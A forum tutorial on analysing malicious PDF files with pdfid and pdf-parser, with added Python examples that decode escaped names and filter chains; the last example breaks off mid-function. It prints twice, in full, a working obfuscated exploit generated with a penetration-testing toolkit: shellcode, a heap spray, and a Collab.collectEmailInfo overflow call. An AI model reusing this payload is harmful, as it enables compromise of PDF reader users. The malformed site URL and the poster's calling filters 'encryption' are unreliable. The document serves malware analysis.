


Messages - Alkapone

Tutorials / Re: Analyzing Malicious Malware Embedded in Adobe PDF Files
« on: October 02, 2013, 11:25:47 PM »
Can you send me those PDFs?

And you don't need a sandbox with this,

because you can disarm the JavaScript in the Adobe PDF reader.


The command

Code:
python pdfid.py --disarm testfile.pdf

will manually change /Javascript into /J47d7xnsnsScrript,

therefore not allowing the Adobe PDF JavaScript engine to execute it.

Because in the Adobe PDF reader everything is... god, I can't remember the word.

If it has /Javascript, /javascript or /JS, those will execute,

but /Ja8d7s899 and stuff like that will not execute.
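The disarm mechanism this reply describes, as an added Python example (not the poster's code and not the code of pdfid itself): a small scanner over constructed PDF bytes that decodes the '#xx' name escapes, counts the action keywords the way pdfid's N(M) columns do, and case-flips those keywords in place. The sample bytes, the KEYWORDS tuple and the function names are assumptions made for this example; running it prints the pdfid-style counts before and after disarming.

```python
"""Added example, not the forum post's code and not Didier Stevens' pdfid:
shows the two name tricks in the reply above, '#xx' hex escapes and case
flipping, on constructed PDF bytes. PDF names are case-sensitive, so a
reader looking for /JavaScript does not act on /jAVAsCRIPT; that is the
whole mechanism behind --disarm."""
import re

NAME_RE = re.compile(rb'/[^\s/<>\[\]()%{}]*')   # one name token, '/' included
HEX_RE = re.compile(rb'#([0-9A-Fa-f]{2})')       # a '#xx' escape inside a name

# Action-related names pdfid reports; the reader acts on these (assumed list).
KEYWORDS = ('/JS', '/JavaScript', '/AA', '/OpenAction', '/Launch',
            '/AcroForm', '/RichMedia', '/ObjStm', '/JBIG2Decode')


def decode_name(raw: bytes) -> str:
    """Expand '#xx' escapes so /#4a#53 compares equal to /JS."""
    return HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode('latin-1')


def _flip(b: int) -> int:
    """Swap the case of one ASCII letter byte; leave every other byte alone."""
    return b ^ 0x20 if (65 <= b <= 90) or (97 <= b <= 122) else b


def swap_case_name(raw: bytes) -> bytes:
    """Flip the case of every letter in a raw name, keeping '#xx' escapes as
    escapes so the byte length (and every xref offset) is unchanged. This
    reproduces the lines pdfid --disarm prints, e.g.
    /J#61va#53#63r#69#70#74 -> /j#41VA#73#43R#49#50#54."""
    out = bytearray()
    i = 0
    while i < len(raw):
        if HEX_RE.match(raw, i):
            out += b'#%02x' % _flip(int(raw[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(_flip(raw[i]))
            i += 1
    return bytes(out)


def count_keywords(pdf: bytes) -> dict:
    """pdfid-style counts, keyword -> (hits, of which written with '#xx').
    pdfid prints these as 'N(M)'; the post's '1(1)' is one hit, one escaped."""
    counts = {k: [0, 0] for k in KEYWORDS}
    for m in NAME_RE.finditer(pdf):
        name = decode_name(m.group(0))
        if name in counts:
            counts[name][0] += 1
            if b'#' in m.group(0):
                counts[name][1] += 1
    return {k: tuple(v) for k, v in counts.items()}


def disarm(pdf: bytes) -> bytes:
    """Case-flip every keyword name in place, as --disarm does: same size,
    same structure, but the reader no longer recognises the actions."""
    def flip(m):
        raw = m.group(0)
        return swap_case_name(raw) if decode_name(raw) in KEYWORDS else raw
    return NAME_RE.sub(flip, pdf)


# Constructed sample with the hex-escaped names seen in the post's output.
SAMPLE_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj\n<< /Type /Catalog /Open#41#63tion 5 0 R >>\nendobj\n"
    b"5 0 obj\n<< /#54#79pe /#41#63#74i#6fn /S /J#61va#53#63r#69#70#74 /#4a#53 6 0 R >>\nendobj\n"
    b"6 0 obj\n<< /Length 20 >>\nstream\napp.alert('sample');\nendstream\nendobj\n"
)

if __name__ == '__main__':
    for label, data in (('original', SAMPLE_PDF), ('disarmed', disarm(SAMPLE_PDF))):
        print(label, {k: v for k, v in count_keywords(data).items() if v[0]})
```

Like pdfid, this scans raw bytes and does not inflate object streams, so names hidden inside an /ObjStm are not counted; that is why pdfid reports the /ObjStm count as a hint. The case flip works because PDF name objects are compared byte for byte, so /jAVAsCRIPT is just an unknown key the reader ignores, while the file's size and xref offsets stay valid.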


Tutorials / Analyzing Malicious Malware Embedded in Adobe PDF Files
« on: September 30, 2013, 10:54:30 PM »
This tutorial is going to teach you how to find malicious data within PDF readers.

I find it pretty cool because instead of writing

strings #filename

gdb

objects

etc. etc.

you don't need to know all this, because there is a tool that simplifies pulling information out of the PDF reader, almost just like "grep".


What will you need?

Python installed, Windows or Linux

Code:
pdf-reader
pdfid


Now I'm going to write this by myself without having to look up information, so if I mess up I'll fix it.
I'm just writing this out to see how much of this I remembered.


When you open up a PDF file: PDF incorporated a JavaScript engine for the PDF reader,

which allows the use of executing JavaScript code.

Malicious hackers will insert these JavaScript codes into the objects within a PDF file,

modifying strings and whatnot.

So instead of having

/Javascript

a hacker will turn it into something like /jAVAsCRIPT

etc. etc.

An example output:

Code:
root@bt:/pentest/forensics/pdfid# python pdfid.py --disarm testfile.pdf
/Open#41#63tion -> /oPEN#61#43TION
/J#61va#53#63r#69#70#74 -> /j#41VA#73#43R#49#50#54
/#4a#53 -> /#6a#73
PDFiD 0.0.11 testfile.pdf
 PDF Header: %PDF-1.5
 obj                    6
 endobj                 6
 stream                 1
 endstream              1
 xref                   1
 trailer                1
 startxref              1
 /Page                  1(1)
 /Encrypt               0
 /ObjStm                0
 /JS                    1(1)
 /JavaScript            1(1)
 /AA                    0
 /OpenAction            1(1)
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /Colors > 2^24         0

We can see that there is embedded code within
/JS
/JavaScript
/OpenAction

Notice at the top how OpenAction is changed to something else?

It's to obfuscate it from antiviruses.

Our goal is to pull the JavaScript code out of the, I call them tables, or objects, however you say it.


First command to execute:

Disarm the PDF file

Code:
python pdfid.py --disarm testfile.pdf

What this does is change the case of the letters in the words to make it something else, so when you open the .pdf file it is safe and nothing will execute.


The (1) indicates that there is an obfuscation inside that table.

So now you have basic information:

what's obfuscated.

But now you need to go in deeper; there is a piece of software called

pdf-parser.py

pdf-parser is nothing more than a grep-like utility on Linux, just that it's made for pulling contents out of the PDF file.

So now we need to locate the embedded malicious JavaScript code.

pdf-parser has a grep utility where you can search for certain stuff within the PDF file,

so execute this:

Code:
python pdf-parser.py --search javascript filename.pdf

What this will do is search the contents of the PDF file for anything in relation to JavaScript.

So this is what we get back:

Code:
obj 5 0
 Type: /Action
 Referencing: 6 0 R
 [(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]

 <<
   /Type /Action
   /S /JavaScript
   /JS 6 0 R
 >>

Things to note here:

1. The object is 5
2. It uses JavaScript
3. As you can see the JavaScript is encoded, but --search still found it, which is awesome
4. /Type Action

So now we know that JavaScript is included in object 5 and is getting referenced through object 6 as well.

So what do we do now?

We pretty much just jump to the next location.

Since 5 is referencing 6 and 5 was referenced in the search for JavaScript, we know that the next
one is going to be holding the JavaScript code itself.

Example:

Code:
python pdf-parser.py --object 5 --filter testfile.pdf
obj 5 0
 Type: /Action
 Referencing: 6 0 R
 [(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]

 <<
   /Type /Action
   /S /JavaScript
   /JS 6 0 R
 >>


Notice: /JS 6 0 R

So now we know the JS is being held in table 6.

So now we will filter the jump and paste the JavaScript code.

Code:
python pdf-parser.py --object 6 --filter testfile.pdf

Code:
obj 6 0
 Type:
 Referencing:
 Contains stream
 [(2, '<<'), (2, '/Length'), (1, ' '), (3, '6532'), (2, '/#46ilt#65r'), (2, '['), (2, '/#46#6c#61teDeco#64e'), (2, '/A#53C#49#49He#78Decod#65'), (2, ']'), (2, '>>'), (1, '\r\n')]

 <<
   /Length 6532
   /Filter [
   /FlateDecode /ASCIIHexDecode]
 >>



And now we finally see the JavaScript code:

Code:
>>

 '\n\t\tvar ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub71
4%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");\n\t\tvar oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";\n\t\tfor (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");\n\t\tNFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;\n\t\tHyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");\n\t\tnjvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;\n\t\tCEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length\n\t\twhile 
(HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;\n\t\tFycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\tmozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\twhile(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;\n\t\tSScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();\n\t\tfor (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;\n\t\tvar rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");\n\t\twhile(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;\n\t\tthis.collabStore = 
Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});\n\t\t\t\t\t'




Obviously this is all crowded together, but if we want to organize it to show the code a lot better we will type

Code:
python pdf-parser.py --object 6 --filter --raw testfile.pdf

The filter and raw options will output it in a readable format:

Code:
        var ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub71
4%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");
        var oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";
        for (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");
        NFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;
        HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");
        njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;
        CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length
        while (HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;
        FycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
        mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
        while(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;
        SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();
        for (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;
        var rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");
        while(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;
        this.collabStore = Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});




Which is now readable.

But since this software uses the
Quote
/FlateDecode /ASCIIHexDecode]

you have to find a way to decrypt it.

I found a site that helps in analyzing those types of encryptions, which can be located at

http://wepawet.cs.ucsb.edu.com


I was using the SET (Social Engineer Toolkit) to generate a malicious .pdf file

and then I analyzed it with these tools.


Note: Not all malicious PDF files will incorporate that as an encryption method, and you may just get lucky.
Sometimes there will be and sometimes there won't; there are like 4 other methods for encryption on this.

The encrypted JavaScript code you see up there was done by the SET encryption thing.


Anyway, I hope you learned something from this.

And if I wrote this tutorial shittily, I'm sorry.
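The reference following and stream decoding the tutorial above does by hand with pdf-parser, as an added Python example (not the poster's code and not pdf-parser's own): it finds the object whose /S is /JavaScript after decoding the '#xx' name escapes, follows /JS N 0 R to the stream object, applies the /Filter chain the post shows ([/FlateDecode /ASCIIHexDecode], which are standard compression and hex encoding filters applied in array order, so they can be reversed locally without any key), and pulls a few triage indicators out of the decoded script. The PDF bytes, the harmless sample script and all function names are constructed for this example; a direct /Length value and the indirect /JS N 0 R form are assumed.

```python
"""Added example, not the forum post's code and not Didier Stevens' pdf-parser:
walks /S /JavaScript -> /JS N 0 R to the stream object and applies the
stream's /Filter chain ([/FlateDecode /ASCIIHexDecode] in the post), then
pulls out cheap triage indicators. All PDF bytes here are constructed."""
import binascii
import re
import zlib

OBJ_RE = re.compile(rb'(\d+)\s+(\d+)\s+obj\s*(.*?)\s*endobj', re.S)
NAME_RE = re.compile(rb'/[^\s/<>\[\]()%{}]*')
HEX_RE = re.compile(rb'#([0-9A-Fa-f]{2})')


def decode_name(raw: bytes) -> str:
    """Expand '#xx' escapes so /#4a#53 compares equal to /JS."""
    return HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode('latin-1')


def normalize_names(data: bytes) -> bytes:
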